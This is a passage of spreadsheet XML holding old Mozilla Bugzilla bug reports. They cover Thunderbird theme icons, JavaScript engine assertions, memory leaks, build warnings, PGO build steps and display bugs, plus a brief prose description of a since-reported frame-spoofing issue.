    <t>tkh212+bugzilla</t>
  </si>
  <si>
    <t>THUNDERBIRD-509258</t>
  </si>
  <si>
    <t>Update theme icon.png and preview.pngs for 3.0</t>
  </si>
  <si>
    <t>The theme files icon.png and preview.png provide an icon that's shown in the list of themes in the addon manager and a preview of the theme when it's selected. 
icon.png should be something recognizably in the style of the theme to let the user quickly pick it out of a list. Ideally we would consistently use something from the main toolbar that will always be present and strongly themed like Firefox's use of the Reload button. Instead judging by old releases we decided to mostly sort-of use new-mail-alert.png and then haven't really. For qute and gnomestripe we use a generic straight-on closed envelope rather than the perspective very older-Qute-styled opened envelope that they use for new-mail-alert.png and for pinstripe we use the Reload button from Firefox 1.5 which is a particularly horrible choice.
We should either redo all three new-mail-alert.pngs so that they are strongly and recognizably in the style of the current themes and use them for all three preview.pngs or decide that they were a bad choice switch to something like the Write icon and switch the preview.pngs.
For the preview.pngs we need to do three things:
* ensure that they are of the current theme not a past version (qute) or another theme (gnomestripe since it's just a copy of qute's)
* ensure that they don't display icons that we plan on removing from the toolbar
* ensure that they don't trip over bug 509242 by making them all less than 220px wide: currently the pinstripe image is particularly badly horizontally compressed</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-299976</t>
  </si>
  <si>
    <t>Remove identical items from glossary/index datasources and make them platform-specific</t>
  </si>
  <si>
    <t>Now that Search is much more exposed in the Help Viewer we need to improve that
a bit.
Enter tab in the Search bar.
Result: Most of the results in the list are duplicated. Tabbed Browsing is
listed 6 times 5 of which link to the top of tabbed_browsing.xhtml.</t>
  </si>
  <si>
    <t>CORE-611724</t>
  </si>
  <si>
    <t>Assertion failure in TraceRecorder::emitIf()</t>
  </si>
  <si>
    <t>Assertion failure: isCond(x) at .../js/src/jstracer.cpp:5327
  =&gt; JS_ASSERT(isCond(x))  in  TraceRecorder::emitIf()
version: latest tracemonkey tip</t>
  </si>
  <si>
    <t>soubok</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-418455</t>
  </si>
  <si>
    <t>Need favicon</t>
  </si>
  <si>
    <t>maybe based on the thunderbird logo?</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-336920</t>
  </si>
  <si>
    <t>nsGTKRemoteService leaks</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
1) Try to debug string buffer leaks
2) Come out with the following stack:
n/a     .root
  1       __libc_start_main+0x000000D3  (/lib/tls/libc.so.6)
    1       main (../../../mozilla/xpfe/bootstrap/nsAppRunner.cpp:1750)
      1       main1 (../../../mozilla/xpfe/bootstrap/nsAppRunner.cpp:1227)
        1       nsGTKRemoteService::Startup(char const* char const*) (../../../../mozilla/toolkit/components/remote/nsGTKRemoteService.cpp:121)
          1       nsCString::operator=(char const*) (../../../dist/include/string/nsTString.h:118)
            1       nsCSubstring::Assign(char const* unsigned int) (../../../../mozilla/xpcom/string/src/nsTSubstring.cpp:318)
              1       nsCSubstring::ReplacePrep(unsigned int unsigned int unsigned int) (../../../../mozilla/xpcom/string/src/nsTSubstring.cpp:192)
                1       nsCSubstring::MutatePrep(unsigned int char** unsigned int*) (../../../../mozilla/xpcom/string/src/nsTSubstring.cpp:145)
                  1       nsStringBuffer::Alloc(unsigned int) (../../../../mozilla/xpcom/string/src/nsSubstring.cpp:213)
                    1       NS_LogAddRef_P (../../../mozilla/xpcom/base/nsTraceRefcntImpl.cpp:1012)
3) Figure out that nsGTKRemoteService and all its strings are leaking.</t>
  </si>
  <si>
    <t>CALENDAR-307033</t>
  </si>
  <si>
    <t>It is too easy to damage a remote calendar</t>
  </si>
  <si>
    <t>Subscribing to a remote calendar means that every change will be uploaded. The
risk of damaging it is a bit too big. We need to make it less easy to destroy data.
A possible solution would be to have an option to 'import into a new calendar'
in the new calendar wizard. That would download the file into a local storage
calendar so that the user can do what he wants with the data but the file on
the server won't be changed.</t>
  </si>
  <si>
    <t>CORE-376811</t>
  </si>
  <si>
    <t>Bookmark toolbar folders don't auto-open on hover</t>
  </si>
  <si>
    <t>On other platforms and on Bon Echo on Mac when you open one folder on the bookmark toolbar moving the mouse over other folders will auto-open them. This does not quite happen on current trunk.
1. Click on a bookmark toolbar folder to open it.
2. Move the mouse left or right to another folder.
The other folder should open but it doesn't.
A couple of things to note: 
You can get the other folders to open automatically but what you do is move the mouse over the opened menupopup then move it straight onto the other folder toolbarbutton at which point it will open.
On a places bookmark build the result is slightly different. You cannot get the other folders to open automatically but moving the mouse over the other folders will at least highlight the toolbarbutton visually. I am unsure though if the places toolbar has the auto-open code for folders though.
Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.9a4pre) Gecko/20070407 Minefield/3.0a4pre ID:2007040704 [cairo]</t>
  </si>
  <si>
    <t>CORE-357398</t>
  </si>
  <si>
    <t>js_ExpandErrorArguments can crash in OOM conditions</t>
  </si>
  <si>
    <t>If js_ExpandErrorArguments is passed unicode arguments it can crash in the error handling block (this only happens if OOM occurs earlier in the function):
error:
    if (reportp-&gt;messageArgs) {
        i = 0
        while (reportp-&gt;messageArgs[i])
            JS_free(cx (void *)reportp-&gt;messageArgs[i++]) &lt;-- crash
    }
This is similar to bug 319264 but the case here was missed when that bug was fixed. The arguments should only be free'd if they were allocated by this function.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-231211</t>
  </si>
  <si>
    <t>Make bug link configurable per channel/server</t>
  </si>
  <si>
    <t>If you are ever participating in more than one project that uses IRC and
Bugzilla you will find that you'd really want the ability to configure the bug
links per channel and/or server. For example when I am on irc.mozilla.org's
#mozilla channel the default link is good but when I am on
irc.osafoundation.org's #chandler channel I want the domain to point to
osafoundation.org.</t>
  </si>
  <si>
    <t>TOOLKIT-337824</t>
  </si>
  <si>
    <t>Profile Manager completely horked</t>
  </si>
  <si>
    <t>Using Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060512 Minefield/3.0a1
starting Minefield from the Mac command line via
   Minefield.app/Contents/MacOS $ ./firefox-bin -p
shows the profile manager however the window that appears is not functional: 
- one is not able to select any of the other profiles
- pressing START MINEFIELD with the default selected profile results in a hang
- buttons for DELETE and CREATE work only after pressing them twice
- pressing CANCEL during the profile creation ends in a loop of two or three dialogs to start creating profiles with the final dialog being totally blank
- pressing EXIT keeps Minefield active [without windows]
- keyboard navigations seems broken
This severely limits testing possibilities and thus marking this as a Blocker [Blocks development and/or testing work]</t>
  </si>
  <si>
    <t>patrick.hendriks+bugzilla</t>
  </si>
  <si>
    <t>CORE-325292</t>
  </si>
  <si>
    <t>col visibility:collapse shows cells in printing second page of a table</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Printing a table with 
that goes over to a second page shows blank cells rather than suppressing them.  The first page is right. True in print preview as well.  See a simple sample at the test URL.
Reproducible: Always
Steps to Reproduce:
1.Load test page
2.File | Print Preview
3.Scroll to second or third page
Actual Results:  
data rows of : ShowDon't Showdo
on page one show: Show | do
on page two show: Show |____| do
Expected Results:  
all lines on page two to look like on page 1
I haven't found a work around tried width:0px and the like no good.</t>
  </si>
  <si>
    <t>mozilla_bugs_1</t>
  </si>
  <si>
    <t>CORE-851556</t>
  </si>
  <si>
    <t>Graphics: Layers</t>
  </si>
  <si>
    <t>GestureEventListener.cpp:140:40: warning: comparison between signed and unsigned integer expressions [-Wsign-compare]</t>
  </si>
  <si>
    <t>Build warning:
{
/mozilla/gfx/layers/ipc/GestureEventListener.cpp: In member function â€˜nsEventStatus mozilla::layers::GestureEventListener::HandleInputEvent(const mozilla::InputData&amp;)â€™:
/mozilla/gfx/layers/ipc/GestureEventListener.cpp:140:40: warning: comparison between signed and unsigned integer expressions [-Wsign-compare]
/mozilla/gfx/layers/ipc/GestureEventListener.cpp:142:43: warning: comparison between signed and unsigned integer expressions [-Wsign-compare]
}
This is from these comparisons:
&gt; 140     if (event.mTime - mTapStartTime &lt;= MAX_TAP_TIME) {
&gt; 141       if (mState == GESTURE_WAITING_DOUBLE_TAP &amp;&amp;
&gt; 142           event.mTime - mLastTapEndTime &gt; MAX_TAP_TIME) {
https://mxr.mozilla.org/mozilla-central/source/gfx/layers/ipc/GestureEventListener.cpp#140
event.mTime is a uint32_t and mTapStartTime is a uint64_t -- so the left side of the comparisons ends up having type uint64_t.
MAX_TAP_TIME is an int (i.e. it's signed) for some reason. It's only got one usage outside of the two lines quoted above -- it's passed to PostDelayedTask here:
https://mxr.mozilla.org/mozilla-central/source/gfx/layers/ipc/GestureEventListener.cpp#171
and *there* it's used as an int.  We could easily make it an unsigned value though and just let PostDelayedTask implicitly convert it to an int.  (It's not anywhere near UINT32_MAX so unsigned --&gt; signed conversion will do the right thing.)
SO: I think we should just make MAX_TAP_TIME unsigned possibly uint32_t to match event.mTime so that the comparisons against it won't trigger build warnings.</t>
  </si>
  <si>
    <t>CORE-349705</t>
  </si>
  <si>
    <t>In  Strict Warning: function cancel does not always return a value</t>
  </si>
  <si>
    <t>[Mozilla/5.0 (Windows U Win98 en-US rv:1.8.1b2) Gecko/20060821 SeaMonkey/1.1a] (candidates-1.1a 2006082118) (W98SE)
When clicking on the Add Account... button:
[
Warning: function cancel does not always return a value
Source File: chrome://global/content/bindings/wizard.xml
Line: 274 Column: 7
Source Code:
]
(inly the first time in a session !?)</t>
  </si>
  <si>
    <t>CORE-248179</t>
  </si>
  <si>
    <t>Page broken if xsl:output encoding is different from frame src encoding</t>
  </si>
  <si>
    <t>XSLT-generated output is displayed as garbage if XSL style sheet
generates  (or  ) and the frame src (or embedded
html) encoding is different from xsl:output encoding.
testcase (XML):
  http://bugzilla.mozilla.gr.jp/attachment.cgi?id=2289action=view
XSL style sheet used by XML above
(generates frameset xsl:output encoding=UTF-8):
  http://bugzilla.mozilla.gr.jp/attachment.cgi?id=2285action=view
frame src used by the testcase (EUC-JP):
  http://www.mozilla.gr.jp/</t>
  </si>
  <si>
    <t>harunaga</t>
  </si>
  <si>
    <t>CORE-816117</t>
  </si>
  <si>
    <t>Gecko Profiler</t>
  </si>
  <si>
    <t>Reduce Gecko Profiler overhead on windows</t>
  </si>
  <si>
    <t>At the moment the Gecko profiler has a very significant overhead on windows. We want to make that better.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-465592</t>
  </si>
  <si>
    <t>To enable PGO on Thunderbird a module in the Mozilla core needs to have PGO disabled.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b2pre) Gecko/20081107 Shredder/3.0b1pre
Bug 448515 refers to how there isn't a Profiledbuild option.
In this bug I wrote how I was able to successfully build Thunderbird with PGO but I had to disable PGO in one module in the mozilla core.
In mozilla/modules/lcms/src/Makefile.in I had to add the environment variable ( or make variable not sure) NO_PROFILE_GUIDED_OPTIMIZE = 1.
My thought is the mozilla core should not have to be modified to allow thunderbird to be built with PGO.  The Thunderbird build configuration should be modified to some how enable PGO for Thunderbird since Firefox can be built with PGO without modifying this particular Makefile.
I am currently working on this problem and need help and direction.  The work I've done so far can be found here. 
http://zenit.senecac.on.ca/wiki/index.php/PGO_Related_Bugs#0.2_Release
Reproducible: Always
Steps to Reproduce:
( html format can be found here - http://zenit.senecac.on.ca/wiki/index.php/PGO_Related_Bugs/Thunderbird )
1.
Modify the file $topsrcdir/mozilla/modules/lcms/src/Makefile.in and add the line NO_PROFILE_GUIDED_OPTIMIZE = 1. 
2.
Configure the .mozconfig in the $topsrcdir for ac_add_options --enable-application=mail and mk_add_options MOZ_CO_PROJECT=mail. My .mozconfig looks like
ac_add_options --enable-application=mail
mk_add_options MOZ_CO_PROJECT=mail
mk_add_options MOZ_MAKE_FLAGS=-j5
ac_add_options --disable-vista-sdk-requirements
ac_add_options --disable-tests
ac_add_options --enable-optimize
ac_add_options --disable-debug
3.
In the $topsrcdir execute the build command make -f client.mk build MOZ_PROFILE_GENERATE=1
4.
After it has finished Thunderbird needs to be profiled. Run the executable found in $objdir/mozilla/dist/bin and do a few scenarios and close Thunderbird. 
5.
This next step I did not due on Windows and it worked ok. I have to try it and see what happens. I'm told this step has to take place.
In the $topsrcdir execute the build command make -f client.mk clean
6.
In the $topsrcdir execute the build command make -f client.mk build MOZ_PROFILE_USE=1
Actual Results:  
Thunderbird is built with PGO</t>
  </si>
  <si>
    <t>chris.bugzilla</t>
  </si>
  <si>
    <t>CORE-410509</t>
  </si>
  <si>
    <t>XPTC_InvokeByIndex() ASM mis-aligns stack causing crash</t>
  </si>
  <si>
    <t>Created attachment 295115
Set 128-bit alignment for called function
The ASM code in XPTC_InvokeByIndex() juggles the x86 stack pointer but does not necessarily follow the stack pointer alignment in use by the compiler.  This can - and does - lead to protection faults in situations where specific stack pointer alignment is required.
This patch adjusts the stack pointer such that it is set to 128-bit alignment for the child function called.  This patch applies cleanly to the 1.8.1.11 and trunk source trees.
Description of rationale to follow.</t>
  </si>
  <si>
    <t>swsnyder</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-376371</t>
  </si>
  <si>
    <t>[1.1] Add support for resource element on submission to allow more flexibility</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a3pre) Gecko/20070305 Minefield/3.0a3pre
Build Identifier: 
Need a mechanism to submit contents to a variable number of locations which can all be configured to be different submission targets.  It would be ideal to specify the submission targets via instance data.  This is possible in XForms1.1 with the new  element that is a child of .
This mechanism will be used for the Integrating the Healthcare Enterprise (http://www.ihe.net) and it's Request Form for Data capture (RFD) profile.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-381300</t>
  </si>
  <si>
    <t>Frame spoofing is possible within a short time frame while the window is loading.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
When opening a window from a script it is possible to spoof the content of the newly opened window's frames within a short time frame while the window is loading.
Because the exact time is non-constant and unknown multiple attempt are carried out. The failed ones are silently discarded using a try catch block.
This is similar to Bug 343168.
Both the 'frames[x].document.open()' method (described in above bug) and a normal 'frames[x].document' method are shown to reliably produce the exploit.
Reproducible: Always
Steps to Reproduce:
See attached test case.</t>
  </si>
  <si>
    <t>ronen.zilberman</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-399328</t>
  </si>
  <si>
    <t>AllPeers 0.70.1 stubs need swapping out</t>
  </si>
  <si>
    <t>Extension ID: allpeers@allpeers.com
AMO page: https://addons.mozilla.org/en-US/firefox/addon/3234
Real XPIs found here:
http://www.allpeers.com/download/amo/0.70.1/allpeers_beta-0.70.1-fx-linux.xpi
http://www.allpeers.com/download/amo/0.70.1/allpeers_beta-0.70.1-fx-macosx.xpi
http://www.allpeers.com/download/amo/0.70.1/allpeers_beta-0.70.1-fx-windows.xpi</t>
  </si>
  <si>
    <t>CORE-395917</t>
  </si>
  <si>
    <t>simulating a click on an anchor using dispatchEvent and initMouseEvent does not trigger a real click</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 fr rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.2 fr rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Using dom events to programmatically click on an anchor (see the example) the result is not the same as if the user had clicked on the anchor. The href portion is ignored when using dom events which is not obvious why (both opera and khtml do not behave this way).
Reproducible: Always
Steps to Reproduce:
1. create a file with the following html :
	Simulate click/title&gt;
		test
function simulateclick()
{
	var elem = document.getElementById(test_link)
	var evt = document.createEvent(MouseEvents)
	evt.initMouseEvent(click true true window 0 0 0 0 0 false false false false 0 elem)
	elem.dispatchEvent(evt)
}
2. click on the simulate click button
Actual Results:  
nothing happens
Expected Results:  
the test.html page is opened (should follow the link since the default action for clicking on a link is to follow it).</t>
  </si>
  <si>
    <t>julien.blanc</t>
  </si>
  <si>
    <t>CORE-505227</t>
  </si>
  <si>
    <t>liboggz fails to compile on MinGW</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Build Identifier: 
MinGW compilation uses config_win32.h which causes problems like redefinition of uint8_t. Using config.h fixes the problem. I've decided to make more general fix. I've renamed config.h to config_gcc.h and moved #ifdefs from source files to new config.h that just includes proper config. I've also moved #undef DEBUG to the new config.h. This way we may avoid more modifications of imported files.
Reproducible: Always</t>
  </si>
  <si>
    <t>SEAMONKEY-248102</t>
  </si>
  <si>
    <t>Splashscreen mozilla.bmp is removed during Upgrade</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 de-AT rv:1.7) Gecko/20040616
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 de-AT rv:1.7) Gecko/20040616
During Upgrade (Moz 1.6 de-AT to Moz 1.7 de-AT) with
Installer the Splashscreen mozilla.bmp is removed.
Reproducible: Always
Steps to Reproduce:
1. Install Mozilla 1.6 de-AT
2. Upgrade with Installer to Mozilla 1.7 de-AT
3.
Actual Results:  
Installer should not remove the Splashscreen mozilla.bmp
Expected Results:  
Removed mozilla.bmp</t>
  </si>
  <si>
    <t>Alexander_Pircher</t>
  </si>
  <si>
    <t>CORE-127189</t>
  </si>
  <si>
    <t>sizetopopup should set min size = popup size</t>
  </si>
  <si>
    <t>In order for XBL select widgets to not shrink narrower when space is
constrained we need sizetopopup for a menulist to set the min width of the
menulist to the popup width (in addition to the preferred width).</t>
  </si>
  <si>
    <t>CORE-397216</t>
  </si>
  <si>
    <t>nsPersistentProperties shutdown leak in uconv</t>
  </si>
  <si>
    <t>Created attachment 281982
patch
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/intl/uconv/src/nsWinCharset.cpp&amp;rev=1.38&amp;mark=70-7178-80#68
This logic is just wrong. Currently on Windows InitInfo is called twice once from the constructor and once (for the same nsPlatformCharset) from this stack:
uconv.dll!nsPlatformCharset::InitInfo()  Line 80	C++
uconv.dll!nsPlatformCharset::MapToCharset(inANSICodePage={...} outCharset={...})  Line 107	C++
uconv.dll!nsPlatformCharset::GetDefaultCharsetForLocale(localeName={...} oResult={...})  Line 157	C++
i18n.dll!nsCollationWin::Initialize(locale=0x033039a0)  Line 121	C++
i18n.dll!nsCollationFactory::CreateCollation(locale=0x033039a0 instancePtr=0x032e5eec)  Line 67	C++
places.dll!nsNavHistory::Init()  Line 365	C++
places.dll!nsNavHistoryConstructor(aOuter=0x00000000 aIID={...} aResult=0x0012e9f4)  Line 9	C++
xpcom_core.dll!nsGenericFactory::CreateInstance(aOuter=0x00000000 aIID={...} aResult=0x0012e9f4)  Line 80	C++
xpcom_core.dll!nsComponentManagerImpl::CreateInstance(aClass={...} aDelegate=0x00000000 aIID={...} aResult=0x0012e9f4)  Line 1714	C++
xpcom_core.dll!nsComponentManagerImpl::GetService(aClass={...} aIID={...} result=0x0012eaa8)  Line 1926	C++
xpc3250.dll!nsJSCID::GetService(_retval=0x0012ec98)  Line 899	C++
xpcom_core.dll!NS_InvokeByIndex_P(that=0x0000000b methodIndex=0x00000001 paramCount=0x0012ec98 params=0x0042f7bb)  Line 102	C++
xpc3250.dll!XPCWrappedNative::CallMethod(ccx={...} mode=0x0000000b)  Line 2326	C++
xpc3250.dll!XPCWrappedNative::CallMethod(ccx={...} mode=CALL_METHOD)  Line 2326	C++
xpc3250.dll!XPC_WN_CallMethod(cx=0x0326a740 obj=JSObject [... slots] argc=0x00000001 argv=0x032cf1f0 vp=0x0012ef48)  Line 1467	C++
js3250.dll!js_Invoke(cx=0x0326a740 argc=0x00000001 vp=0x032cf1e8 flags=0x00000000)  Line 1382	C
js3250.dll!js_Interpret(cx=0x0326a740 pc=0x022fce7f result=0x0012f618)  Line 4092	C
js3250.dll!js_Invoke(cx=0x0326a740 argc=0x00000003 vp=0x032cf040 flags=0x00000002)  Line 1402	C
xpc3250.dll!nsXPCWrappedJSClass::CallMethod(wrapper=0x023169f0 methodIndex=0x0003 info=0x00dc33e8 nativeParams=0x0012f914)  Line 1443	C++
xpc3250.dll!nsXPCWrappedJS::CallMethod(methodIndex=0x0003 info=0x00dc33e8 params=0x0012f914)  Line 566	C++
xpcom_core.dll!PrepareAndDispatch(self=0x02316820 methodIndex=0x00000003 args=0x0012f9d4 stackBytesToPop=0x0012f9c4)  Line 114	C++
xpcom_core.dll!SharedStub()  Line 142	C++
xpcom_core.dll!nsObserverList::NotifyObservers(aSubject=0x02316820 aTopic=0x00000000 someData=0x100382a4)  Line 129	C++
xpcom_core.dll!nsObserverList::NotifyObservers(aSubject=0x00000000 aTopic=0x100382a4 someData=0x00000000)  Line 129	C++
xpcom_core.dll!nsObserverService::NotifyObservers(aSubject=0x00000000 aTopic=0x100382a4 someData=0x00000000)  Line 184	C++
xul.dll!XRE_main(argc=0x00000004 argv=0x00bf96a8 aAppData=0x00bf9ae0)  Line 3097	C++
firefox.exe!main(argc=0x00000004 argv=0x00bf96a8)  Line 153	C++
firefox.exe!__tmainCRTStartup()  Line 597	C
firefox.exe!mainCRTStartup()  Line 414	C
This causes gCnt to up to 2 and never become 0 leading to the nsGREResProperties and thus nsPersistentProperties (stored in nsCOMPtr there) leak.</t>
  </si>
  <si>
    <t>CORE-384840</t>
  </si>
  <si>
    <t>gfxXlibNativeRenderer::DRAW_SUPPORTS_NONDEFAULT_VISUAL should be distinct from DRAW_SUPPORTS_CLIP_LIST</t>
  </si>
  <si>
    <t>Created attachment 268743
patch to fix
The values in this enum should be distinct.</t>
  </si>
  <si>
    <t>SEAMONKEY-154535</t>
  </si>
  <si>
    <t>Don't depend on sidebarOverlay for context menus</t>
  </si>
  <si>
    <t>context menus break if someone decides they don't want sidebarOverlay.xul since
we include the contentAreaContextOverlay from there.  We should remove the
hidden dependency.  Patch forthcoming...</t>
  </si>
  <si>
    <t>CORE-102777</t>
  </si>
  <si>
    <t>Factor the XUL from the HTML widget acc. files</t>
  </si>
  <si>
    <t>Proposing 3 new directories in the accessible/src directory:
base
html
xul
base to contain:
nsGenericAccessible
nsAccessible
nsAccessibilityService
nsRootAccessible
html will contain all the existing nsHTMLFoo widgets with the possible addition of
nsLinkableAccessible - for linked text
pulled from nsAccessible.cpp file since I believe it only concerns HTML
xul will contain all the nsXULFoo widgets
nsHTMLBlockAccessible looks like it may need to be renamed since the XUL button
will need to be able to do hit detection on flowing text just like
nsHTML4Button does.</t>
  </si>
  <si>
    <t>MOZILLACLASSIC_GRAVEYARD-229</t>
  </si>
  <si>
    <t>MOZILLACLASSIC_GRAVEYARD</t>
  </si>
  <si>
    <t>HTML comments are not closed in the right place</t>
  </si>
  <si>
    <t>Created by Wilson Afonso (wilson@zaz.com.br) on Wednesday April 15 1998 6:19:19 AM PDT
Additional Details :
Mozilla is failing to recognize te closing of a comment tag
under certain circunstances.  For example the following
code: 
table
trtdComment 1 !-- X --
ok/td/tr
trtdComment 2 !--X--
ok/td/tr
trtdComment 3 !-- X--
ok/td/tr
trtdComment 4 !--X --
ok/td/tr
trtdComment 5 !-- X ---
ok/td/tr
trtdComment
6!--X--ok/td/tr
/table
Show up as:
Comment 1
Comment 2
Comment 3
Comment 4
Comment 5
Comment 6ok</t>
  </si>
  <si>
    <t>CORE-287648</t>
  </si>
  <si>
    <t>Unify 'request' object interface for DNS and PPS asyncResolve methods</t>
  </si>
  <si>
    <t>Unify 'request' object interface for DNS and PPS asyncResolve methods
nsIProtocolProxyService::asyncResolve returns a nsISupports request object that
can be canceled via nsIProtocolProxyService::cancelAsyncResolve.
nsIDNSService::asyncResolve returns a nsIDNSReqeuest object that can be canceled
via nsIDNSRequest::cancel.
These should be handled similarly.  Maybe they should each return an object with
a cancel method or maybe they should each move the cancel method onto the
service interface.  Another approach involves implementing nsIRequest but that
is very heavy weight for these objects.  See bug 282442 comment #43.</t>
  </si>
  <si>
    <t>BUGZILLA-280778</t>
  </si>
  <si>
    <t>remove sendmail and qmail delivery methods on windows</t>
  </si>
  <si>
    <t>Mail::Mailer doesn't support sendmail on windows for two reasons.  
firstly it looks for /usr/lib/sendmail (without the .exe) and will raise an
error if it doesn't exist.
if you tell Mail::Mailer to look for /usr/lib/sendmail.exe it'll use a piped
open to spawn it which isn't supported on windows.
for windows installs we should remove the sendmail delivery option and default
instead to smtp.
ditto for qmail.</t>
  </si>
  <si>
    <t>CORE-170782</t>
  </si>
  <si>
    <t>Typo in domerr.msg</t>
  </si>
  <si>
    <t>s/doe not/does not/
The patch:
Index: dom/src/base/domerr.msg
===================================================================
RCS file: /cvsroot/mozilla/dom/src/base/domerr.msgv
retrieving revision 1.7
diff -u -0 -r1.7 domerr.msg
--- dom/src/base/domerr.msg     25 Sep 2001 22:42:56 -0000      1.7
+++ dom/src/base/domerr.msg     25 Sep 2002 18:33:00 -0000
@@ -102 +102 @@
-DOM_MSG_DEF(NS_ERROR_NO_AGGREGATION                 Component doe not support
aggregation)
+DOM_MSG_DEF(NS_ERROR_NO_AGGREGATION                 Component does not
support aggregation)</t>
  </si>
  <si>
    <t>CORE-218255</t>
  </si>
  <si>
    <t>[ATK Accessibility] ATKText's bounds is reported incorrectly</t>
  </si>
  <si>
    <t>It only reports the bounds of its first child.</t>
  </si>
  <si>
    <t>CALENDAR-364672</t>
  </si>
  <si>
    <t>Minimonth: Chinese weekday names indistinguishable even after expanding sidebar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: http://download.mozilla.org/?product=lightning-0.3&amp;os=win
When using Chinese WinXP but using English version of Thunderbird and Lightning the week names are incomplete. Only shows first two characters of the three character names. Most likely a display issue as Sunbird .3a2 displayed these correctly.
Reproducible: Always
Steps to Reproduce:
1. Install English version of Lightning into English version of Thunderbird on Chinese WinXP.
Actual Results:  
Lightning uses local language settings but mis-displays week titles
Expected Results:  
should be three character week titles ()
Theme: CrossOver theme 2.3 (still occurs with default theme)</t>
  </si>
  <si>
    <t>gekacheka</t>
  </si>
  <si>
    <t>THUNDERBIRD-435804</t>
  </si>
  <si>
    <t>Remaining rdf cleanup for FilterListDialog</t>
  </si>
  <si>
    <t>Created attachment 322581
patch v1
Now that nsMsgFilterDataSource is gone there's no reason that functions in the filter-dialog should need to deal with URIs.  Rather they can just pass around servers/folders which removes the need for the RDF service.</t>
  </si>
  <si>
    <t>CORE-469769</t>
  </si>
  <si>
    <t>ASSERTION: Too many calls to ScriptDidExecute with document.write in deferred script</t>
  </si>
  <si>
    <t>Created attachment 353142
testcase
Loading the testcase triggers:
###!!! ASSERTION: Too many calls to ScriptDidExecute: 'mScriptsExecuting &gt; 0' file /Users/jruderman/central/parser/htmlparser/src/nsParser.cpp line 1810
The assertion was added in bug 444322 and  was added in bug 28293.
Bug 461555 will change the behavior of this testcase.  (In fact the testcases for that bug also trigger this assertion.)  Will bug 461555 fix this bug?</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-456125</t>
  </si>
  <si>
    <t>AMO SVN update to fix developer translations error</t>
  </si>
  <si>
    <t>There is an error with saving developer translations that was caused by a change in the maintenance release.  Need to update this which changes a line in app model.  Need to do this today no downtime needed.</t>
  </si>
  <si>
    <t>CORE-374740</t>
  </si>
  <si>
    <t>Array.join() is slow for large arrays - can easily be made much better - solution attached</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a3pre) Gecko/20070319 Minefield/3.0a3pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a3pre) Gecko/20070319 Minefield/3.0a3pre
The performance of Array.join() is very poor for large arrays. This can be massively improved by re-defining Array.prototype.join as in the attached test case. 
Reproducible: Always
Steps to Reproduce:
1. Open the attached fastjoin.html in Firefox
2.
3.
Actual Results:  
Two timings are reported via alert boxes one with the standard join and one with the proposed replacement join. The time for the replacement join is much quicker.
Expected Results:  
Ideally the standard Array.join() operation would be at least as quick as the replacement either by adopting it directly or some equivalent or better approach.
IE6 runs the test case in near zero time - I reckon they must implement Array.join() natively it is fantastically quick.
Firefox normal a.join() is about the same as var str='' for (var n=0n&lt;a.lengthn++) str+=a[n]
This can easily be bettered even at the javascript level using the attached code but is still much slower than IE6. We don't like things that run better in IE (and there are not many of them)...</t>
  </si>
  <si>
    <t>duncan.loveday</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-305168</t>
  </si>
  <si>
    <t>Too many recipients when copy/paste address line or sending from MS Access (increase max to 2000)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla Thunderbird version 1.0.6 (20050716)
Problem first found when developing a Microsoft Access database.
There is a facility to email a list of people from the database. A process reads
every record puts all the email addresses into a variable (varEmail) and sends
the variable to the Email program with this VBA code:
DoCmd.SendObject acSendNoObject   varEmail
The default Email program will open and place all the addresses into the To
line. The user may then complete the email message and send.
This procedure should work with any MAPI compliant email program. It works well
with Outlook Outlook Express and Eudora.
However with Thunderbird Access returns and error message that there were Too
many message recipients. There are in fact about 150 addresses. I can cut and
paste the entire list into Thunderbird's address line it just will not accept
